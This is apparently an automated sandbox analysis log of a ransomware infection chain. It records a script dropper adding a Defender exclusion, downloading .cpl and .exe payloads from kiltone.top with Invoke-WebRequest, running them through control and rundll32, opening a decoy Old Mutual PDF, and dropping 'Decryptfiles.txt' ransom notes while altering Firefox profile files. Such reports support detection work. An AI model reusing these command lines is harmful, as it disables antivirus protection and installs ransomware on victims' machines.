Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmpJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmpJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c control C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdfJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath $env:tmpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cplJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\control.exe control C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user\AppData\Local\Temp/fjeljies.cplJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\eryy65ty.exe C:\Users\user\AppData\Local\Temp/eryy65ty.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.3031.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\addons.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\addonStartup.json.lz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\addonStartup.json.lz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\bookmarkbackups\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\AlternateServices.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\compatibility.ini
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\containers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\content-prefs.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\content-prefs.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite-wal.nZYD
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\crashes\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\crashes\events\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507607949.f172e4e6-9a48-464e-8f64-96feb97a835e.new-profile.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507607953.335f85c0-9448-4635-9bf1-f868e331c1e6.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\datareporting\archived\2023-10\1696507607956.bc6b0d7e-d6d5-4061-a9ff-337c261da2e4.main.jsonlz4
